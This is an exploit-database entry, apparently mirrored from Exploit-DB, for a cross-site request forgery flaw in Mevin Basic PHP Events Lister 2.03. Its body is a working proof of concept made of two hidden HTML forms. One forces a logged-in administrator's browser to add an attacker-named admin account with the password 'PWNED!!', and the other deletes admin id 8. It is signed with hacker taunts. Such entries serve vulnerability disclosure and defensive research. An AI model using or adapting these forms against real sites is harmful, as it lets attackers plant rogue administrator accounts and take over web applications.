[] NeoSense
E X P L O I T S
title author type platform port cve id

Mevin Basic PHP Events Lister 2.03 - Cross-Site Request Forgery

Author: Crazy_Hacker
type: webapps
platform: php
port: 
date_added: 2011-07-21 
date_updated: 2011-07-21 
verified: 0 
codes: OSVDB-74226 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comBasic-php-events-lister2.03.zip
#######################################################
#	Author:			Crazy_Hacker
#	Script:			Mevin Basic PHP Events Lister v2.03
#	Exploit type: 	CSRF Vulnerability [Add & Delete Admin]
#	Download:		http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip
# 	Risk: 			High
#	Contact:		jy8@hotmail.com
#######################################################


<form name="setup" action="http://127.0.0.1/events2/admin/user_add.php" method="post">
<input name="uname" type="hidden" value="Crazy_Hacker" />
<input name="pword" type="hidden" value="PWNED!!" />
<input type=submit name=submit value="Add Admin">
</form>
<form action="http://localhost/events2/admin/user_delete.php?id=8" method="post">
<input type="hidden" name="ud_id" value="8">
<input type="submit" name="submit" value="Delete Admin">
</form>

				\\// S3crity just Suck5 \\//

#EOF
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.